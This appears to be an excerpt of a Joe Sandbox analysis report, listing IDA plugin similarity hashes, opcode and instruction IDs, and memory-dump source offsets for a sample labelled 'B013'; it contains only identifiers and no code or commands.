                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c05f1d1a508087a609d83b4f0a28cb32590f46f8f916cdc8d367336b83fa69f6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c4dbff0023d7cc00ccfc40eff673bd1b8f3096ab65005f9761b0c742ef5d37d4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c05f1d1a508087a609d83b4f0a28cb32590f46f8f916cdc8d367336b83fa69f6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C21E5B59002499FDB10CFA9D985ADEBFF5FB48310F14841AE958A3310D378A954CF60
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8064076ecd82de6c15d4ccbc5c916c0fda7f620c9b4b4e2ceaa6530e1c6d6b32
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bec26c9a05f53f8ad6ee15faad6f9c3d24bbac052a74597953cc3a76e6f855c4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8064076ecd82de6c15d4ccbc5c916c0fda7f620c9b4b4e2ceaa6530e1c6d6b32
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A119D34300A518FC714DF28C858B6E77E6BF85B54B1541A9E445CB376CB75EC4ACB90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c4ac6a1c4f48fb1a6147a76940c3566166ec90bddeccdb2781989f726e5a7455
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ce2e59fd95d80797abca4113a1847c7b33592a17afbc4e2530e558eb708f1d9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4ac6a1c4f48fb1a6147a76940c3566166ec90bddeccdb2781989f726e5a7455
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC11EEB2C083898FEB15CBAC88106EEBBF1FF96715F40449AC446AB205D776A506CF81
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2313742813.0000000001D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D4D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1d4d000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 502c7c921ee6a960ed4a1fb4a1a4901b97535e6863ed43e504f79c90cf62fce6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ee1b3c52d7673e9f366da4fa14c2982e9702a3ada8c8fbb5e41b889725bab2c4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 502c7c921ee6a960ed4a1fb4a1a4901b97535e6863ed43e504f79c90cf62fce6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB21CF355087808FCB03CF24C994715BF72EB46214F28C1EAD8498F2A3C33A980ACB62
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e483c37d4caaeb48fb776cb55371d935324b68b0ec6333864b92bc2b8de26c1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 183daa399ee667b22645dbe5243df06227bd65c232102e8147ef0f6a546e4211
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e483c37d4caaeb48fb776cb55371d935324b68b0ec6333864b92bc2b8de26c1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121C2B59003499FDB10CFAAD984ADEBFF5FB48320F14841AE958A3350D374A954CFA5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ffe759d47c9dcee9f519e1a18bc35fabf0cc96623c11fb3488b672c2d4ef2624
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c70a0e53c1501ba4d732080b0a1e52f2499449e789a40cb214e6db4ecb781db
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffe759d47c9dcee9f519e1a18bc35fabf0cc96623c11fb3488b672c2d4ef2624
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F211E671E006698BDF25DBA8C8447EEBBF2BFC8344F084629C546F7248DB751945CB91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e1f4da5457d25173bff184cc148282a6d19e61717cdf040f3a5edf9f2b9a8246
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ca9bb87e2cb8801aafbe7c9229b90343e64356f2187a181b5fe34c427fd39015
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1f4da5457d25173bff184cc148282a6d19e61717cdf040f3a5edf9f2b9a8246
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90217231A107069BDB00AF68C85039AB3B5FFD9320F148625D95C7B345DF7569858790
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2ab29c6e4a5048681aba7201d5fcc213458c575e29a512e861b6f824eb414704
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d76d91395de43445a7ca5f4911db31e65ac849c7e003910ff9a2a8760a6abb8b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ab29c6e4a5048681aba7201d5fcc213458c575e29a512e861b6f824eb414704
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4911BF75D292198FCF04DFAAE9846EDBBF2AF89301F14812AE414BB315D7744811CBA0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2313652885.0000000001D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D3D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1d3d000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 01cf9fae60a48c282d7c9c51f8122940c63bde907c51fcf38372a5def07ff10a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3dddfbe9e45d2a65a735aa3d6f14e957c73625718305e89cd4ab474371949942
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01cf9fae60a48c282d7c9c51f8122940c63bde907c51fcf38372a5def07ff10a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7121DF76904280DFCB16CF54D9C4B16BF72FB88324F28C6A9D9490B216C33AE426CF91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2313652885.0000000001D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D3D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1d3d000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6661459c3433321b07d8f64afacb39bbaa0d518417f4deb54e81dc84db06b2ef
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3bb5bf4e2c865dacd5ddf1d9681fdfb467de379d9abde452b999db29d57d3820
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6661459c3433321b07d8f64afacb39bbaa0d518417f4deb54e81dc84db06b2ef
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2711E176504640CFDB02CF54D9C4B56BF72FB88324F24C2A9D9090B616C33AE45ACFA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7ed838ad7e990de3bec78328b977305c0366538c223ab4916e7c694448c1a926
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 35d59a106ffb6c83a943ff0952326fee0c2edd7268969e6f97a75b92f0d6f1c1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ed838ad7e990de3bec78328b977305c0366538c223ab4916e7c694448c1a926
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F1126B69003098FDB10CF9AC444BDEFBF4EB48310F10842EE959A7200C3B5A545CFA4
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1073a9199caa1bf7d7105fe820c740ec5501b6f3efe4632a67ee188153569765
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7305bc8fdbe838aaba6b05173627441eb1b276f888ee9c5566a2e7944ed3f937
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1073a9199caa1bf7d7105fe820c740ec5501b6f3efe4632a67ee188153569765
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12014C74E49209DBD700DFA9C4446FEBBF9BB4E700F40B8A6D419A7209D7309A448B40
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b1b6ac990b4c62059078252f38a0b4a024bfe4bcaa806e4af87e24814af9dd1d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9404a09c43480a614ad354ba8a5c22916460ee2863eff2810b2cacd2ae36e684
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1b6ac990b4c62059078252f38a0b4a024bfe4bcaa806e4af87e24814af9dd1d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF116D74E08208DFCB11DFA9C8856EDBBF6BB0A700F04A5AAC419A725AD7308641CB00
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 47e58b2b9351fbed8bbe6883fc5a1be23635b659f59d768f08e90bacdf0fe6d3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f21e030c4a4d06fa4d1cf350943b2152695eed1c84408895e9621af744f9969
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47e58b2b9351fbed8bbe6883fc5a1be23635b659f59d768f08e90bacdf0fe6d3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D018870B002099FC744DF7DC45569EB7E6BFC8300F1184A8D509DB3A1DA716D058BE2
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86142d1f4f1cc84bbb17f59b98c706b98e315bb9f5866ff62d0c43eaf465eb8d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 47ab4da656b1d526e34f8a91153fed504a2c11a296d9ca006600a982e4e30152
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86142d1f4f1cc84bbb17f59b98c706b98e315bb9f5866ff62d0c43eaf465eb8d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 471103B59103499FCB10DF9AC949BDEBBF8EB48320F10841AE959A7210C3B4A944CFA5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c0d8f06daa3c14fd3d3f85c836cb7f9449af33eda1f60d48a486c4f95e191a4b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a0545d21deb334f92dca02ab9e7d6ea16fd20f6c2faf790cb4a16981cd1f88e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0d8f06daa3c14fd3d3f85c836cb7f9449af33eda1f60d48a486c4f95e191a4b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0110FB6C003498FDB20CF9AC444BDEFBF4EB88324F10841AD529A7210D375A545CFA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3755266976a966f153597c8e1d4fd72da5378d359d504922d70a48fd8b252504
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 21e1283f4886b905a7ff00b34f51224399b39b50c2e6e03a7254f44b88f5980e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3755266976a966f153597c8e1d4fd72da5378d359d504922d70a48fd8b252504
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A60192B1A007698BEB15DBA8C8587EEBEF1BF89300F041A2AD446B7244DB745944CBA5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aa0043edc0acd0ca4bca030ea3e686a224638928dbbca25018dd0179d626df05
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d72d89a7e440655d3dcd1668779420ff04bedc3e4fac2427793fcb7330dbbfa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa0043edc0acd0ca4bca030ea3e686a224638928dbbca25018dd0179d626df05
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC1118B58103499FCB20DF9AD949BDEFFF4EB48320F14841AE958A7250C374A584CFA5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2313652885.0000000001D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D3D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1d3d000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21e668fdd86a8aee5f9160878301420fda6f5d2f410efcfc46658d806b476439
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2538ce7b5c47efabdc969662522a06ae071e69bc0102296c52f5b310f30e5ec6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21e668fdd86a8aee5f9160878301420fda6f5d2f410efcfc46658d806b476439
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C012B3100C7449AE7208B99CEC4767BFD9DFA4321F18C419ED4D0A282C734D841CEB1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 506bd9946fe204e5fb2ccca25c874deab0873c756c845f105e891fa2d16f7a12
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 52aa6e9e930d819e1ba7ee926cbeeaf3fef1c51eead0dee7f4cd12303caecd9d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 506bd9946fe204e5fb2ccca25c874deab0873c756c845f105e891fa2d16f7a12
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC019A34E182199BCF14CFAAE8446EDBFF4AF8E310F00916AE810B3301C7705855CBA5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bf03eee72b70545e87b2e84851c189b14905a194f3ba9c61723e3a58d7e38a70
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a6b05cafbfc5e1c14de1480fad52a63d089b90ff5f044e82c9872859bd38644
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf03eee72b70545e87b2e84851c189b14905a194f3ba9c61723e3a58d7e38a70
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F02832F013119FC716A77C98185BE7BEB9FC9214708447AED0AC7399DB319C028761
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 905b93003871d49e465f79b72a19097c8cc871667dd26a6ed1597c66752e7ee4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e3cd0cfd8d17ed12062ccaa7070db51616515abfc46b261657b3b2e4aee6880d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 905b93003871d49e465f79b72a19097c8cc871667dd26a6ed1597c66752e7ee4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C01A2312053418BD710AF68D891B8A77B2FFD6310F148779D948AF3D6CB75684587A0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

